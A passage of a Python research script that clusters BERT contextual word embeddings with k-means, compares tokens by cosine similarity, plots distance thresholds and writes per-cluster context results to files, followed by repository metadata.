word_of_cluster_1.append(label_list[km])
sent_of_cluster_1.append(inter_sent[km])
if y_kmeans[km] == 2:
word_of_cluster_2.append(label_list[km])
sent_of_cluster_2.append(inter_sent[km])
if y_kmeans[km] == 3:
word_of_cluster_3.append(label_list[km])
sent_of_cluster_3.append(inter_sent[km])
##Plotting
"""User can plot the clusters if they wish"""
#plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
#plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
#plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
#plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
#plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
#plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 150, c = 'black', label = 'Centroids')
#plt.title('Clusters of the word {}' .format(inp_str))
#plt.xlabel('{} Labels Along X-axis' .format(inp_str))
#plt.ylabel('{} Labels Along Y-axis' .format(inp_str))
#plt.legend()
#plt.savefig("/home/amboo/Desktop/BERT/kmeans/{}.png" . format(inp_str))
#plt.clf()
if n_clusters == 5:
kmeans = KMeans(n_clusters = n_clusters , init ="k-means++", max_iter= 300 , n_init= 10, random_state = 0 , precompute_distances = True)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
for km in range(len(y_kmeans)):
if y_kmeans[km] == 0:
word_of_cluster_0.append(label_list[km])
sent_of_cluster_0.append(inter_sent[km])
if y_kmeans[km] == 1:
word_of_cluster_1.append(label_list[km])
sent_of_cluster_1.append(inter_sent[km])
if y_kmeans[km] == 2:
word_of_cluster_2.append(label_list[km])
sent_of_cluster_2.append(inter_sent[km])
if y_kmeans[km] == 3:
word_of_cluster_3.append(label_list[km])
sent_of_cluster_3.append(inter_sent[km])
if y_kmeans[km] == 4:
word_of_cluster_4.append(label_list[km])
sent_of_cluster_4.append(inter_sent[km])
##Plotting
"""User can plot the clusters if they wish"""
#plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
#plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
#plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
#plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
#plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
#plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 150, c = 'black', label = 'Centroids')
#plt.title('Clusters of the word {}' .format(inp_str.upper()))
#plt.xlabel('{} Labels Along Column 0' .format(inp_str.upper()))
#plt.ylabel('{} Labels Along Column 1' .format(inp_str.upper()))
#plt.legend()
#plt.savefig("/home/amboo/Desktop/BERT/kmeans/{}.png" . format(inp_str))
#plt.clf()
##############################################################################################################
### Functions
def Sort(sub_li):
# reverse = None (Sorts in Ascending order)
# key is set to sort using second element of
# sublist lambda has been used
sub_li.sort(key = lambda x: x[1], reverse = True)
return sub_li
import pandas as pd
def get_word_vector(word_no, word_list ,static_list ,dynamic_list, threshold, freq):
global rel_list_
global rel_list
global cos_dist_
global frame
global sort_list
sort_list = []
cos_dist_ = []
global ref
ref = {}
try:
for dynm in range(len(dynamic_list)):
cos_dist = 1 - cosine(static_list[word_no], dynamic_list[dynm])
cos_dist_.append(cos_dist)
ref = {"Words":word_list, "Distance": cos_dist_}
frame = pd.DataFrame(ref, columns = ["Words", "Distance"])
rel_list = frame[frame["Distance"] >= threshold].values.tolist()
#rel_list.sort(reverse = False)
rel_list_ = Sort(rel_list)
for re in range(freq):
sort_list.append(rel_list[re])
#print(len(sort_list))
return sort_list
except IndexError as e:
pass
def get_context(cluster_no, sent_of_cluster, n_el_clus_list, threshold, frequency):
if cluster_no == 0:
empty_sent = []
if clustering_type == 'kmeans':
print(word_of_cluster_0[n_el_clus_list])
for word in str(word_of_cluster_0[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
if clustering_type == 'birch':
print(word_of_cluster_b0[n_el_clus_list])
for word in str(word_of_cluster_b0[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
print(sent_of_cluster[n_el_clus_list])
#frequency = int(input("\nEnter the no of top words to be displayed\n"))
#frequency = 50
#threshold = 0.45
get_word_vector(word_label, word_list_refined0 ,vector_mat_list, vector_list_refined0, threshold, frequency)
#for (root,dirs,files) in os.walk("/home/amboo/Desktop/BERT/context_results/" + inp_str + "/"):
with open(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(cluster_no) + "_" + ".txt", "a") as cw:
cw.write("The Target Word is " + inp_str + "\n")
cw.write("The no of total clusters are " + str(n_clusters) + "\n")
cw.write("The word belongs to {} cluster".format(cluster_no) + "\n")
cw.write(str(word_of_cluster_0[n_el_clus_list]))
cw.write("\n")
cw.write(str(sent_of_cluster[n_el_clus_list]))
cw.write("\n")
cw.write("\n")
for th in sort_list:
cw.write(str(th))
cw.write("\n")
#cw.close()
cw.close()
return sort_list
if cluster_no ==1:
if clustering_type == 'kmeans':
print(word_of_cluster_1[n_el_clus_list])
for word in str(word_of_cluster_1[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
if clustering_type == 'birch':
print(word_of_cluster_b1[n_el_clus_list])
for word in str(word_of_cluster_b1[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
print(sent_of_cluster[n_el_clus_list])
#frequency = int(input("\nEnter the no of top words to be displayed\n"))
#frequency = 50
#threshold = 0.46
get_word_vector(word_label, word_list_refined1 ,vector_mat_list, vector_list_refined1, threshold, frequency)
#for (root,dirs,files) in os.walk("/home/amboo/Desktop/BERT/context_results/" + inp_str + "/"):
with open(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(cluster_no) + "_" + ".txt", "a") as cw:
cw.write("The Target Word is " + inp_str + "\n")
cw.write("The no of total clusters are " + str(n_clusters) + "\n")
cw.write("The word belongs to {} cluster".format(cluster_no) + "\n")
cw.write(str(word_of_cluster_1[n_el_clus_list]))
cw.write("\n")
cw.write(str(sent_of_cluster[n_el_clus_list]))
cw.write("\n")
cw.write("\n")
for th in sort_list:
cw.write(str(th))
cw.write("\n")
cw.close()
return sort_list
if cluster_no == 2:
if clustering_type == 'kmeans':
print(word_of_cluster_2[n_el_clus_list])
for word in str(word_of_cluster_2[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
if clustering_type == 'birch':
print(word_of_cluster_b2[n_el_clus_list])
for word in str(word_of_cluster_b2[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
print(sent_of_cluster[n_el_clus_list])
#frequency = int(input("\nEnter the no of top words to be displayed\n"))
#frequency = 50
#threshold = 0.46
get_word_vector(word_label, word_list_refined2 ,vector_mat_list, vector_list_refined2, threshold, frequency)
#for (root,dirs,files) in os.walk("/home/amboo/Desktop/BERT/context_results/" + inp_str + "/"):
with open(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(cluster_no) + "_" + ".txt", "a") as cw:
cw.write("The Target Word is " + inp_str + "\n")
cw.write("The no of total clusters are " + str(n_clusters) + "\n")
cw.write("The word belongs to {} cluster".format(cluster_no) + "\n")
cw.write(str(word_of_cluster_2[n_el_clus_list]))
cw.write("\n")
cw.write(str(sent_of_cluster[n_el_clus_list]))
cw.write("\n")
cw.write("\n")
for th in sort_list:
cw.write(str(th))
cw.write("\n")
cw.close()
return sort_list
if cluster_no == 3:
if clustering_type == 'kmeans':
print(word_of_cluster_3[n_el_clus_list])
for word in str(word_of_cluster_3[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
if clustering_type == 'birch':
print(word_of_cluster_b3[n_el_clus_list])
for word in str(word_of_cluster_b3[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
print(sent_of_cluster[n_el_clus_list])
get_word_vector(word_label,word_list_refined3,vector_mat_list, vector_list_refined3, threshold, frequency)
with open(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(cluster_no) + "_" + ".txt", "a") as cw:
cw.write("The Target Word is " + inp_str + "\n")
cw.write("The no of total clusters are " + str(n_clusters) + "\n")
cw.write("The word belongs to {} cluster".format(cluster_no) + "\n")
cw.write(str(word_of_cluster_3[n_el_clus_list]))
cw.write("\n")
cw.write(str(sent_of_cluster[n_el_clus_list]))
cw.write("\n")
cw.write("\n")
for th in sort_list:
cw.write(str(th))
cw.write("\n")
cw.close()
return sort_list
if cluster_no == 4:
if clustering_type == 'kmeans':
print(word_of_cluster_4[n_el_clus_list])
for word in str(word_of_cluster_4[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
if clustering_type == 'birch':
print(word_of_cluster_b4[n_el_clus_list])
for word in str(word_of_cluster_b4[n_el_clus_list]).split():
if word.isdigit() == True:
label_number = int(word)
word_label = label_number
print(sent_of_cluster[n_el_clus_list])
#frequency = int(input("\nEnter the no of top words to be displayed\n"))
#frequency = 50
#threshold = 0.46
get_word_vector(word_label, word_list_refined4 ,vector_mat_list, vector_list_refined4, threshold, frequency)
#for (root,dirs,files) in os.walk("/home/amboo/Desktop/BERT/context_results/" + inp_str + "/"):
with open(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(cluster_no) + "_" + ".txt", "a") as cw:
cw.write("The Target Word is " + inp_str + "\n")
cw.write("The no of total clusters are " + str(n_clusters) + "\n")
cw.write("The word belongs to {} cluster".format(cluster_no) + "\n")
cw.write(str(word_of_cluster_4[n_el_clus_list]))
cw.write("\n")
cw.write(str(sent_of_cluster[n_el_clus_list]))
cw.write("\n")
cw.write("\n")
for th in sort_list:
cw.write(str(th))
cw.write("\n")
cw.close()
return sort_list
## Approach 1 :- Obtaining Sentence wise vector embeddings of the words w.r.t clusters
def get_embeddings(list_of_cluster_sentences, n_th_cluster):
globals()["vector_list_" + str(n_th_cluster)] = []
globals()["word_list_" + str(n_th_cluster)] = []
globals()["vector_list_refined" + str(n_th_cluster)] = []
globals()["word_list_refined" + str(n_th_cluster)] = []
for emd in range(len(list_of_cluster_sentences)):
try:
marked_text = "[CLS]" + " " + list_of_cluster_sentences[emd] + " " + "[SEP]"
tokenized_text = tokenizer.tokenize(marked_text)
indexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)
segment_ids = [1]*len(tokenized_text)
tokens_tensors = torch.tensor([indexed_tokens])
segments_tensors = torch.tensor([segment_ids])
with torch.no_grad():
output = model(tokens_tensors, segments_tensors)
hidden_states = output[2]
token_embeddings_ = torch.stack(hidden_states, dim=0)
token_embeddings_ = torch.squeeze(token_embeddings_, dim=1)
token_embeddings_ = token_embeddings_.permute(1,0,2)
print(token_embeddings_.size())
token_vecs_sum_ = []
for token in token_embeddings_:
sum_vec_ = torch.sum(token[-4:], dim=0)
token_vecs_sum_.append(sum_vec_)
token_vecs = hidden_states[-2][0]
sentence_embedding = torch.mean(token_vecs, dim=0)
print ("Our final sentence embedding vector of shape:", sentence_embedding.size())
for tok in range(len(tokenized_text)):
if tokenized_text[tok] != inp_str and tokenized_text[tok] != wrt:
globals()["vector_list_" + str(n_th_cluster)].append(token_vecs_sum_[tok])
globals()["word_list_" + str(n_th_cluster)].append(tokenized_text[tok])
except (IndexError, RuntimeError) as e:
#locals()["residual_of_cluster_" + str(n_th_cluster)] = []
#locals()["residual_of_cluster_" + str(n_th_cluster)].append(list_of_cluster_sentences[emd])
continue
for refi in range(len(globals()["word_list_" + str(n_th_cluster)])):
if globals()["word_list_" + str(n_th_cluster)][refi] not in globals()["word_list_refined" + str(n_th_cluster)]:
globals()["word_list_refined" + str(n_th_cluster)].append(globals()["word_list_" + str(n_th_cluster)][refi])
globals()["vector_list_refined" + str(n_th_cluster)].append(globals()["vector_list_" + str(n_th_cluster)][refi])
if clustering_type == "kmeans":
## Splitting into context buckets
if n_clusters == 1:
print("The number of clusters is {}".format(n_clusters))
get_embeddings(sent_of_cluster_0, 0)
if n_clusters == 2:
print("The number of clusters is {}".format(n_clusters))
get_embeddings(sent_of_cluster_0, 0)
get_embeddings(sent_of_cluster_1, 1)
if n_clusters == 3:
print("The number of clusters is {}".format(n_clusters))
get_embeddings(sent_of_cluster_0, 0)
get_embeddings(sent_of_cluster_1, 1)
get_embeddings(sent_of_cluster_2, 2)
if n_clusters == 4:
print("The number of clusters is {}".format(n_clusters))
get_embeddings(sent_of_cluster_0, 0)
get_embeddings(sent_of_cluster_1, 1)
get_embeddings(sent_of_cluster_2, 2)
get_embeddings(sent_of_cluster_3, 3)
if n_clusters == 5:
print("The number of clusters is {}".format(n_clusters))
get_embeddings(sent_of_cluster_0, 0)
get_embeddings(sent_of_cluster_1, 1)
get_embeddings(sent_of_cluster_2, 2)
get_embeddings(sent_of_cluster_3, 3)
get_embeddings(sent_of_cluster_4, 4)
#print(len(word_list_refined0))
#print(len(vector_list_refined0))
#print(len(sentence_list_refined2))
## Threshold Plot
## Threshold Plot
def tplot(clust, label_int):
if clust == 0:
label_int_list = []
#locals()["word_list_refined" + str(clust)]
for j in range(len(word_list_refined0)):
label_int_list.append(j)
cos_d_ = []
label_ = label_int
print("\n********************************************\n")
#locals()["vector_list_refined" + str(clust)]
for dynm in range(len(vector_list_refined0)):
cos_d = 1 - cosine(vector_mat_list[label_],vector_list_refined0[dynm])
cos_d_.append(cos_d)
fer0 = {}
fer0 = {"Words" : word_list_refined0, "Word Int": label_int_list, "Distance": cos_d_}
frame0 = pd.DataFrame(fer0, columns = ["Words", "Word Int", "Distance"])
frame0.plot.scatter(x="Word Int", y = "Distance", c='DarkBlue')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(clust)+ "_" + "_" + "label" + "_" + str(label_) + "_" +"scatter.png")
print("The Mean Distance is {} \n********************************************\n".format(frame0["Distance"].mean()))
print("The Mode Distance is {} \n********************************************\n".format(frame0["Distance"].mode()))
print("The Median Distance is {} \n********************************************\n".format(frame0["Distance"].median()))
print("The Max Distance is {} \n********************************************\n".format(frame0["Distance"].max()))
print("\n********************************************\n")
print("Kurtosis Information is {} \n********************************************\n".format(frame0.kurtosis(axis=0)))
if clust == 1:
label_int_list = []
#locals()["word_list_refined" + str(clust)]
for j in range(len(word_list_refined1)):
label_int_list.append(j)
cos_d_ = []
label_ = label_int
print("\n********************************************\n")
#locals()["vector_list_refined" + str(clust)]
for dynm in range(len(vector_list_refined1)):
cos_d = 1 - cosine(vector_mat_list[label_],vector_list_refined1[dynm])
cos_d_.append(cos_d)
fer0 = {}
fer0 = {"Words" : word_list_refined1, "Word Int": label_int_list, "Distance": cos_d_}
frame0 = pd.DataFrame(fer0, columns = ["Words", "Word Int", "Distance"])
frame0.plot.scatter(x="Word Int", y = "Distance", c='DarkBlue')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(clust)+ "_" + "_" + "label" + "_" + str(label_) + "_" +"scatter.png")
print("The Mean Distance is {} \n********************************************\n".format(frame0["Distance"].mean()))
print("The Mode Distance is {} \n********************************************\n".format(frame0["Distance"].mode()))
print("The Median Distance is {} \n********************************************\n".format(frame0["Distance"].median()))
print("The Max Distance is {} \n********************************************\n".format(frame0["Distance"].max()))
print("\n********************************************\n")
print("Kurtosis Information is {} \n********************************************\n".format(frame0.kurtosis(axis=0)))
if clust == 2:
label_int_list = []
#locals()["word_list_refined" + str(clust)]
for j in range(len(word_list_refined2)):
label_int_list.append(j)
cos_d_ = []
label_ = label_int
print("\n********************************************\n")
#locals()["vector_list_refined" + str(clust)]
for dynm in range(len(vector_list_refined2)):
cos_d = 1 - cosine(vector_mat_list[label_],vector_list_refined2[dynm])
cos_d_.append(cos_d)
fer0 = {}
fer0 = {"Words" : word_list_refined2, "Word Int": label_int_list, "Distance": cos_d_}
frame0 = pd.DataFrame(fer0, columns = ["Words", "Word Int", "Distance"])
frame0.plot.scatter(x="Word Int", y = "Distance", c='DarkBlue')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(clust)+ "_" + "_" + "label" + "_" + str(label_) + "_" +"scatter.png")
print("The Mean Distance is {} \n********************************************\n".format(frame0["Distance"].mean()))
print("The Mode Distance is {} \n********************************************\n".format(frame0["Distance"].mode()))
print("The Median Distance is {} \n********************************************\n".format(frame0["Distance"].median()))
print("The Max Distance is {} \n********************************************\n".format(frame0["Distance"].max()))
print("\n********************************************\n")
print("Kurtosis Information is {} \n********************************************\n".format(frame0.kurtosis(axis=0)))
if clust == 3:
label_int_list = []
for j in range(len(word_list_refined3)):
label_int_list.append(j)
cos_d_ = []
label_ = label_int
print("\n********************************************\n")
#locals()["vector_list_refined" + str(clust)]
for dynm in range(len(vector_list_refined3)):
cos_d = 1 - cosine(vector_mat_list[label_],vector_list_refined3[dynm])
cos_d_.append(cos_d)
fer0 = {}
fer0 = {"Words" : word_list_refined3, "Word Int": label_int_list, "Distance": cos_d_}
frame0 = pd.DataFrame(fer0, columns = ["Words", "Word Int", "Distance"])
frame0.plot.scatter(x="Word Int", y = "Distance", c='DarkBlue')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(clust)+ "_" + "_" + "label" + "_" + str(label_) + "_" +"scatter.png")
print("The Mean Distance is {} \n********************************************\n".format(frame0["Distance"].mean()))
print("The Mode Distance is {} \n********************************************\n".format(frame0["Distance"].mode()))
print("The Median Distance is {} \n********************************************\n".format(frame0["Distance"].median()))
print("The Max Distance is {} \n********************************************\n".format(frame0["Distance"].max()))
print("\n********************************************\n")
print("Kurtosis Information is {} \n********************************************\n".format(frame0.kurtosis(axis=0)))
if clust == 4:
label_int_list = []
#locals()["word_list_refined" + str(clust)]
for j in range(len(word_list_refined4)):
label_int_list.append(j)
cos_d_ = []
label_ = label_int
print("\n********************************************\n")
#locals()["vector_list_refined" + str(clust)]
for dynm in range(len(vector_list_refined4)):
cos_d = 1 - cosine(vector_mat_list[label_],vector_list_refined4[dynm])
cos_d_.append(cos_d)
fer0 = {}
fer0 = {"Words" : word_list_refined4, "Word Int": label_int_list, "Distance": cos_d_}
frame0 = pd.DataFrame(fer0, columns = ["Words", "Word Int", "Distance"])
frame0.plot.scatter(x="Word Int", y = "Distance", c='DarkBlue')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + str(clust)+ "_" + "_" + "label" + "_" + str(label_) + "_" +"scatter.png")
print("The Mean Distance is {} \n********************************************\n".format(frame0["Distance"].mean()))
print("The Mode Distance is {} \n********************************************\n".format(frame0["Distance"].mode()))
print("The Median Distance is {} \n********************************************\n".format(frame0["Distance"].median()))
print("The Max Distance is {} \n********************************************\n".format(frame0["Distance"].max()))
print("\n********************************************\n")
print("Kurtosis Information is {} \n********************************************\n".format(frame0.kurtosis(axis=0)))
for tl in range(lower_label_int,upper_label_int):
tplot(cluster_num_plot, tl)
## Collecting results for cluster 0
if n_clusters == 1:
if clustering_type == 'kmeans':
for res0 in range(len(word_of_cluster_0)):
try:
get_context(0,sent_of_cluster_0,res0, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(0,sent_of_cluster_0,res0, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(0,sent_of_cluster_0,res0, thresh, 1)
continue
if n_clusters == 2:
if clustering_type == 'kmeans':
for res0 in range(len(word_of_cluster_0)):
try:
get_context(0,sent_of_cluster_0,res0, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(0,sent_of_cluster_0,res0, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(0,sent_of_cluster_0,res0, thresh, 1)
continue
if clustering_type == 'kmeans':
for res1 in range(len(word_of_cluster_1)):
try:
get_context(1,sent_of_cluster_1,res1, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(1,sent_of_cluster_1,res0, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(1,sent_of_cluster_1,res1, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(1,sent_of_cluster_1,res1, thresh, 1)
continue
if n_clusters == 3:
if clustering_type == 'kmeans':
for res0 in range(len(word_of_cluster_0)):
try:
get_context(0,sent_of_cluster_0,res0, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(0,sent_of_cluster_0,res0, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(0,sent_of_cluster_0,res0, thresh, 1)
continue
if clustering_type == 'kmeans':
for res1 in range(len(word_of_cluster_1)):
try:
get_context(1,sent_of_cluster_1,res1, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(1,sent_of_cluster_1,res0, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(1,sent_of_cluster_1,res1, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(1,sent_of_cluster_1,res1, thresh, 1)
continue
## Collecting results for cluster 2
if clustering_type == 'kmeans':
for res2 in range(len(word_of_cluster_2)):
try:
get_context(2,sent_of_cluster_2,res2, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(2,sent_of_cluster_2,res2, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(2,sent_of_cluster_2,res2, thresh, 1)
continue
if n_clusters == 4:
if clustering_type == 'kmeans':
for res0 in range(len(word_of_cluster_0)):
try:
get_context(0,sent_of_cluster_0,res0, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(0,sent_of_cluster_0,res0, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(0,sent_of_cluster_0,res0, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(0,sent_of_cluster_0,res0, thresh, 1)
continue
if clustering_type == 'kmeans':
for res1 in range(len(word_of_cluster_1)):
try:
get_context(1,sent_of_cluster_1,res1, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(1,sent_of_cluster_1,res0, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(1,sent_of_cluster_1,res1, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(1,sent_of_cluster_1,res1, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(1,sent_of_cluster_1,res1, thresh, 1)
continue
## Collecting results for cluster 2
if clustering_type == 'kmeans':
for res2 in range(len(word_of_cluster_2)):
try:
get_context(2,sent_of_cluster_2,res2, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(2,sent_of_cluster_2,res2, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(2,sent_of_cluster_2,res2, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(2,sent_of_cluster_2,res2, thresh, 1)
continue
## Collecting results for cluster 3
if clustering_type == 'kmeans':
for res3 in range(len(word_of_cluster_3)):
try:
get_context(3,sent_of_cluster_3,res3, thresh, 50)
except IndexError as e:
print("1st Exception Occured")
try:
get_context(3,sent_of_cluster_3,res3, thresh, 40)
continue
except IndexError as e1:
print("2nd Exception Occured")
try:
get_context(3,sent_of_cluster_3,res3, thresh, 35)
continue
except IndexError as e2:
print("3rd Exception Occured")
try:
get_context(3,sent_of_cluster_3,res3, thresh, 30)
continue
except IndexError as e3:
print("4th Exception Occured")
try:
get_context(3,sent_of_cluster_3,res3, thresh, 20)
continue
except IndexError as e4:
print("5th Exception Occured")
try:
get_context(3,sent_of_cluster_3,res3, thresh, 10)
continue
except IndexError as e5:
try:
print("6th Exception Occured")
get_context(3,sent_of_cluster_3,res3, thresh,5)
except IndexError as e6:
print("7th Exception Occured")
get_context(3,sent_of_cluster_3,res3, thresh, 1)
continue
except ValueError as e:
continue | [
"noreply@github.com"
] | ambarish-moharil.noreply@github.com |
b865e63a7753fc872a6cae4bc619bda816d10669 | 3c8775c8c778bc9de813c98583cb2b13ff20e001 | /pyradmon/dummymp/_version.py | fde2e2f2af0b824f01b06a8f46ad5c1bb3b114c6 | [
"Apache-2.0"
